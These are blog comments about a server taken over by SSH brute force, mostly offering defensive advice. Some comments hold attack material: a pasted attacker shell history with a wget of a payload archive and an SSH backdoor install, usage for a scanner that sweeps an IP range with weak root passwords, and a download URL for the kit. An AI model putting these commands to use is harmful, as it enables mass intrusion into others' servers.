    Another process expires the ban from iptables (10 * number of bans) days later.
    It also handles ftp brute force attacks.

    I have another one that scans the maillog, and sends reports for smtp and pop3 abuses… It’s good to kick some ass in return!

    I will publish it soon, but not on my own site!

  18. lol,
    its a script to brute root’s but there is no attackers Real IP, cuz since the hacker Hacked the first shell, than from that shell he hack others, cuz there is a long procces to scan thousnd of IP’s so he need a linux shell that stays 24/7 Online, and , only VPS’s or workstations have this abilitys with high performance like intel Xeon,i7,Opteron AMD proccessors etc. hackers need linux shells to build on them, Servers to control other Zombie Clients, or to perform a high traffic DDoS attack..etc.

    Plz don’t waste time to catch the person who did this. Only try securing ur Box,

    -Use Updated Firewalls
    -I complicated Password
    -And don’t create kiddy users.
    -Use other ports for SSH & Telnet not the Default Port like 22-23.

    Best regards
    Ilir Prenku from Kosova

  19. Ilir,
    I know this won’t catch the hacker because they can be behind a long chain of proxies, but it helps to alert the owners that their server is hacked and get it cleaned up and secured.
    Hopefully they will learn to be better administrators and not use stupid passwords!

  20. you have been hack by a romanian hackers team ,and i read in that screen :
    “privat scanner.the scanner can be used only by `MaLaSorTe` team.This scanner `contain` a password file by 3 megabytes long”.
    lol ,try to find the log pass 3mb one and delete it couse maybe is cmod 777 ,and look for other files cmod 777 cause the hackers are writing executables in your server and the they upgrading your server to laugh :))

  21. i have the full script and i have toyed with it try to use ./go.sh 140.0 it scans ranges of ips and then brutforces the pws :) i have poped like 50 root pws now kinda cool really but i don’t do anything with them i typed that from root ssh and it will scan for a bit La-AmParam means you got one it will place the cracked roots in a file called Vuln.txt its just a simple scanner no harm but it uses a lot of bandwidth watch out for scan.pl tho because thats a UDP,TCP XSS RFI LFI scanner! Perl

  22. yeah bro i dont think http://rep.hack-report.info will be doing much of anything there account is suspended for Hacking the BOX ROFL ROFL ROFL not to sound kiddy like :) but disable History -c :)) find the sob kick his door in :) smack him around a bit tell him why you are there and then take off

  23. I just went to the history command and found that two directories were created, one in /home/root called zen and another in /tmp called .ssh. I just deleted all. I just can not understand how is possible that someone called human would do this. Should we apply the same laws than we apply for productive people? fuf…………. the guy like downloaded alecsafk.ilive.ro/a/a.tgz. Here what he did (even he is so stupid that made a typo!!)

    874 w
    875 wget alecsafk.ilive.ro/a/a.tgz
    876 ls
    877 tar xzvf zen-bot.jpg
    878 cd zen
    879 ls
    880 cat a
    881 cat b
    882 cat c
    883 ./c 85.25
    884 ./zmeu
    885 ./c
    886 ls
    887 cat c
    888 cat
    889 sed
    890 ls
    891 cat vuln |more
    892 ./zmeu bios.txt vuln.txt 200 path
    893 cat a
    894 cat b
    895 cat f
    896 cat d
    897 cat bios.txt |sort |uniq > zmeu.txt
    898 wc -l zmeu
    899 wc -l zmeu.txt
    900 ./zmeu zmeu.txt vuln.txt 200 path
    901 clear
    902 ls
    903 nano c
    904 ls
    905 chmod +x *
    906 rm -rf zmeu.txt vuln bios.txt
    907 ./c 217.151
    908 cd /tmp
    909 tar xzvf s.jpg
    910 rm -rf s.jpg
    911 mv ssh1 .ssh1
    912 cd .ssh1
    913 nano inst
    914 ./inst
    915 /etc/init.d/sshd restart
    916 cat backdoor.h
    917 /sbin/ipconfig
    918 /sbin/ifcongi |grep inet
    919 /sbin/ifconfig |grep inet
    920 /sbin/ifconfig
    921 /etc/init.d/ssh restart

  24. it’s a script that scans for other computers that have vulnerable sshs passwords ( thesma e way he hacked your computer ) he changue de eth0 becouse the scanner need that subnet and stuff the mfu are a list of possible vulnerable victims ,, karl-koch@hotmail.com if i can help you Messenger.

  25. ” SCANER PRIVAT
    SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe
    SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! ”
    Translate this from Romanian to your language.
    This are romanian script kiddies. You cant trace them to Romania because they use multiple servers just like Lotus said. Get a server, scan from it till it breaks.

    Anyway. It`s a ssh bruteforce scan. Best way to avoid being hacked is :
    1. USE strong passwords.. generated ones.
    2. use a firewall to block all networks on ssh, except yours obviously.
    3. Security by Obscurity : http://null.redcodenetwork.ro/changing-the-ssh-port-without-changing-it/

  26. Oh! This is alarming. I thought Linux has a great security in preventing hackers attack. However, there seems a way to enter into any server. While technology keeps advancing, so do the hacking techniques.

    I think these hackers use a network of proxies which make it difficult to identify from which IP they are targeting the server. While ssh is the most easily used one to gain access to remote shell, this is where we need to make it more secure.

  27. The best way to secure you server, is to change your ssh server port, or to disable login root (they can get access to your server by an user, and use some local root exploit to gain root access). because, the ssh scaners, using the port 22 to scan victims. on my server, the ssh is using a 4 number port. like 6354. and, never get hacked.
    PS: sorry for my bad english :P

  28. Installing and configuring Fail2Ban will help too for securing the server by blocking the IP address of somebody that tries to access the server after couples of tries. The default is 3. this is alone is not enough but it can be added next to other suggestion that was mentioned in this blog.

  29. basically what everybody else said. the “ss” binary is designed to scan an ip range for servers with a given port open. It does thousands of scans per minute and saves the results to a text file. The other executables take an input file (the IP list) and an output file. It’s most likely that if you got broken in, it was through a really simple ssh brute force (seriously, password is not a good password), a RFI exploit, or even a RCE exploit. (google them). Use your brains when setting up a server and you’ll be fine.

  30. nice nice hacker not good :Ddont hack shells nu intaleg nimica ce e acolo shell root plmeqa password go.sh i scanner ssh backgrond you cna yuzet on backtrak5 :D nige but wohh i du dat :D:DD:D:D:

  31. Hi guys! I just saw what you wrote. Unfortunately most of the so called “hackers” are from Eastern Europe(e.g:Macedonia, Bulgaria, Romania,etc.) They are just your machine to gain access to another machines and so on… Probably you have a weak password(pass, password, 123456, root…so on) and do not have installed honeypot. Try installing honeypot and keeping your system up-to-date. It always helps. Another personal point of view is that if you disable root login it will be safe. Another idea would be to uninstall commands editor (pico, nano) and also wget, apt-get, yum, ftp and stuff like this. If you don’t allow him to access external links he will find your machine useless and move on to the next one.
    Best Regards,
    Chip.

  32. There are a lot of vulnerabilities , not only bruteforce on ssh 22. They can get into your computer through Apache or phpMyAdmin vulnerabilities and much more.

  33. You can install Fail2Ban and block all IPs which are have more than xxx failures and report the Attacker automatically over https://www.blocklist.de to the Provider.

  34. the MFU.TXT its the ip range the hacker scan it for ssh scanner its ssh-root scanner
    the result must be in txt calld ” VULN.TXT ”
    ITS OLD KIND OF SSH SCANNER BY ROMANIAN HACKER TEAM
    THY HAVE NOW NEW ONE AND MORE STRONGER IN ARAB TEAM AND INDONESIAN TEAM ……

  35. THE SCAN AS FOLLOW FROM IP
    ./go.sh 211
    ./GO-SH +IP <> START SCAN FROM 211.0.0.1 — TO — 211.255.255.255
    AFTER GET THE RESULT AND FIND PORT 22 OPEN ON SOME IP
    PROGRAM MAKE CHECK THE IP WITH PASS FILE CALLD
    pass_file <<>>

    root /root
    root/admin
    root/guest
    root/123

    :D

  36. If anyone is interested: the exact same “gosh” – paket was uploaded in Oct 2013
    on my ssh-honeypot.. it was retrieved from:

    http://gblteam.webs.com/gosh_tgz_tar

  37. I think the virus turns the server into a VPS server or something so its like I am hosting a VPS server

  38. I just realized that one of my servers (OpenVZ container launched with many others aside) got hacked exact same way.
    What is strange is that I already runned SSH on non standard port like 40022.
    In my case deploy user that I use for accessing local git repository was hacked – I’m not even sure what password was set for that user.

    Is there any way I can cleanup my server or I should drop it and start with new VPS ?

  39. I have this exact problem this very moment on one of my servers, and I’m not able to get rid of it. I disabled root login via ssh, deleted binaries and all the related files, and somehow this guy gets root again and has these files again in /usr/share/locales/af/ …

    What would be proper procedure to get rid of this thing?

  40. Hey, I recommend blocking them with fail2ban and http://www.badips.com, you’ll see a lot of attackers already reported to badips.com, so your logs will also be cleaner.

  41. helllo, this scanner ( brute force ) is a made by a romanian (like me ).


Leave a comment